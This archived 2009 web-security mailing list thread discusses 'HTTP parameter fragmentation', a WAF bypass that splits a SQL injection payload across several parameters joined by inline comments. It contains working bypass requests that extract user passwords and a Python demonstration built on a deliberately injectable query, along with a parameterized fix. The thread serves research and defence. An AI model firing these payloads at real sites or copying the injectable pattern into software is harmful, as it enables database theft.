[WEB SECURITY] HTTP parameters fragmentation

PortSwigger mail at portswigger.net
Thu Aug 20 03:11:29 EDT 2009


For what it's worth, there is an example of using inline comments to span an
XSS attack across multiple different parameters on p412 of The Web
Application Hacker's Handbook.

Cheers
PortSwigger

-----Original Message-----
From: Steve Pinkham [mailto:steve.pinkham at gmail.com] 
Sent: 19 August 2009 21:30
To: lavakumar kuppan; websecurity at webappsec.org
Subject: Re: [WEB SECURITY] HTTP parameters fragmentation

I agree. If it's two different parameters, it's not quite the same as 
HPP.  Somehow glanced over that detail ;-) On the other hand, some of 
the effects of HPP are similar to what you describe.

It's not really a novel technique, I've used it in the past to get 
around XSS filters, but I'm at a loss for a definitive place to point 
for documentation on the issue.
Anyone?

Steve
lavakumar kuppan wrote:
> Not really.
> When multiple parameters of the same name are sent in a single request, 
> different web technologies (ASP, ASP.NET, Java, Python, 
> Perl, PHP etc.) handle it differently.
> This is a problem with the implementation of the HTTP protocol on these 
> technologies. This is what HPP deals with.
> 
> And when it comes to WAF bypass with HPP, the problem is the failure of 
> WAF to mimic the server technology's HTTP implementation, causing 
> an impedance mismatch.
> 
> 
> Dmitriy's method does not exploit impedance mismatch or weakness of the 
> HTTP implementation.
> Instead it is a clever way to exploit a specific type of SQL injection 
> vulnerability (involving two vulnerable parameters in the same query) by 
> splitting the payload so that it cannot be filtered by the WAF but can 
> still be executed by the server.
> 
> Though superficially the two techniques appear to be similar, they are 
> exploiting weaknesses in two different areas.
> The use of inline comments to join the parts of the payload is what is 
> common here.
> 
> This would classify as payload obfuscation IMHO
> 
> Cheers,
> Lava
> http://www.lavakumar.com
> 
> On Thu, Aug 20, 2009 at 12:29 AM, Prasad Shenoy <prasad.shenoy at gmail.com> wrote:
> 
>     Steve Pinkham nailed it I guess. It is a form of HPP? No?
>      
>     P. N. Shenoy
> 
>     On Wed, Aug 19, 2009 at 1:02 PM, lavakumar kuppan <lavakumar.in at gmail.com> wrote:
> 
>         Hi Dmitriy,
> 
>         That is very interesting. It very closely resembles the
>         ModSecurity Filter Bypass that I had discovered some time back.
>         There is just one small difference: I was using the same
>         parameter multiple times (HTTP Parameter Pollution) while you are
>         using multiple parameters, nice trick!
> 
>         I had written a whitepaper on the same, you can find it at
>         http://lavakumar.com/Split_and_Join.pdf
>         The ModSecurity advisory is at
>         http://lavakumar.com/modsecurity_hpp.txt
> 
>         You can find more information about HPP at
>         http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
> 
>         Hope this helps.
> 
>         Cheers,
>         Lava
>         http://www.lavakumar.com
> 
> 
>         2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com>:
> 
>          > While preparing an article about WAF bypassing methods, I found an
>          > interesting way to bypass filters via HTTP parameters fragmentation.
>          >
>          > Vulnerable code example
>          >
>          > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
>          >
>          > The following request doesn't allow an attack to be conducted
>          >
>          > index.php?a=1+union+select+1,2/*
>          >
>          > The following request succeeds using HPF
>          >
>          > index.php?a=1+union/*&b=*/select+1,2
>          >
>          > In that case, the SQL query looks like
>          >
>          > select * from table where a=1 union/* and b=*/select 1,2
>          >
>          > Another example:
>          >
>          > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
>          >
>          > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order by ".$_GET['c']." limit 1");
>          >
>          > Using HPF (HTTP Parameter Fragmentation), the request succeeds:
>          >
>          > index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>          >
>          > The question is: is there any name for the technique? Please advise me if
>          > you know articles or experts in the field (for example, I found a reference in
>          > http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf,
>          > page 79).
>          >
>          > Thank you for your help and cooperation in advance!
>          >
>          > - - - - - - - - - - - - - - -
>          > Best Regards, Dmitry Evteev
>          > Positive Technologies Co.
>          > Tel.: (495) 744-0144
>          > Web: http://www.ptsecurity.ru
>          >
> 
> 
> 


-- 
  | Steven E. Pinkham                      |
  | Security Researcher, Maven Security    |
  | steve.pinkham at mavensecurity.com        |
  | GPG public key ID CD31CAFB             |
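
An added worked example, not code from any of the mails above: it plays Dmitriy's `limit` variant of the vulnerable concatenation through an in-memory SQLite database, next to the same-parameter (HPP) split Lava describes, so the two things the thread distinguishes can be seen side by side: a filter that inspects each parameter on its own lets every fragment through, and only the server's concatenation reassembles the `union ... select ... from` statement. The table names `items` and `users`, the sample rows, the `looks_like_injection` rule and the comma-joining of duplicate parameters (the ASP.NET behaviour described in the Carettoni/Di Paola HPP paper linked earlier in the thread) are assumptions of this example, not anything stated in the mails.

```python
import sqlite3

# Constructed sample schema standing in for the page's "table" and "users";
# column names and rows are invented for this example.
SCHEMA = """
CREATE TABLE items (a INTEGER, b INTEGER, note TEXT);
INSERT INTO items VALUES (1, 1, 'public row');
INSERT INTO items VALUES (2, 2, 'another row');
CREATE TABLE users (id INTEGER, name TEXT, pass TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
"""


def looks_like_injection(value):
    """Hypothetical WAF rule: looks at ONE parameter value at a time, which is
    exactly the blind spot both HPF and HPP rely on."""
    v = value.lower()
    return ("union" in v and "select" in v) or ("select" in v and "from" in v)


def waf_allows(pairs):
    """pairs: list of (name, value) tuples as they arrive on the wire."""
    return not any(looks_like_injection(v) for _, v in pairs)


def php_style_params(pairs):
    """PHP's $_GET keeps only the LAST occurrence of a duplicated name."""
    return dict(pairs)


def comma_join_params(pairs):
    """Emulates a backend that joins duplicate names with ',' (ASP.NET-style
    handling per the HPP paper); this is what makes a same-parameter split work."""
    merged = {}
    for name, value in pairs:
        merged[name] = value if name not in merged else merged[name] + "," + value
    return merged


def build_query(params):
    """Dmitriy's vulnerable concatenation (the `limit` variant), in Python."""
    return ("select * from items where a=" + params["a"]
            + " and b=" + params["b"]
            + " limit " + params["c"])


def run(pairs, merge=php_style_params):
    """'blocked' if the WAF rule fires, 'sql error' if the merged query does not
    parse on this backend, otherwise the rows the server would return."""
    if not waf_allows(pairs):
        return "blocked"
    con = sqlite3.connect(":memory:")
    try:
        con.executescript(SCHEMA)
        return con.execute(build_query(merge(pairs))).fetchall()
    except sqlite3.Error:
        return "sql error"
    finally:
        con.close()


def run_parameterized(pairs, merge=php_style_params):
    """Hardened form: a and b are bound, and c (meant to be a number) is
    validated as an integer before binding instead of being concatenated."""
    params = merge(pairs)
    try:
        limit = int(params["c"])
    except ValueError:
        return "rejected"
    con = sqlite3.connect(":memory:")
    try:
        con.executescript(SCHEMA)
        return con.execute("select * from items where a=? and b=? limit ?",
                           (params["a"], params["b"], limit)).fetchall()
    finally:
        con.close()


# Requests as (name, value) lists, already URL-decoded.
BENIGN = [("a", "1"), ("b", "1"), ("c", "10")]
SINGLE_PARAM = [("a", "1 union select 1,2,pass from users--"), ("b", "1"), ("c", "1")]
# HPF: the payload spans three different parameters, glued by /* ... */.
HPF = [("a", "1 union/*"), ("b", "*/select 1,2,pass/*"), ("c", "*/from users--")]
# HPP: the same fragments all sent as `a`, relying on the server to join them.
HPP = [("a", "1 union/*"), ("a", "*/select 1,2,pass/*"), ("a", "*/from users--"),
       ("b", "1"), ("c", "1")]

if __name__ == "__main__":
    print("benign       :", run(BENIGN))
    print("single param :", run(SINGLE_PARAM))
    print("HPF          :", run(HPF))
    print("HPP on PHP   :", run(HPP))                     # last-wins: broken SQL
    print("HPP, joined  :", run(HPP, comma_join_params))  # comma-join: works
    print("parameterized:", run_parameterized(HPF))
```

The HPF request succeeds against any backend that concatenates, because each parameter is used once and the comments simply swallow the `and b=` and `limit` text between them; the HPP request depends on how the backend merges duplicates, which is Lava's impedance-mismatch point: with last-wins handling the merged SQL is broken, with comma-joining it runs. The parameterized variant is the fix on the application side; a WAF that reassembles the full query before inspecting it is the fix on the filter side.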

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


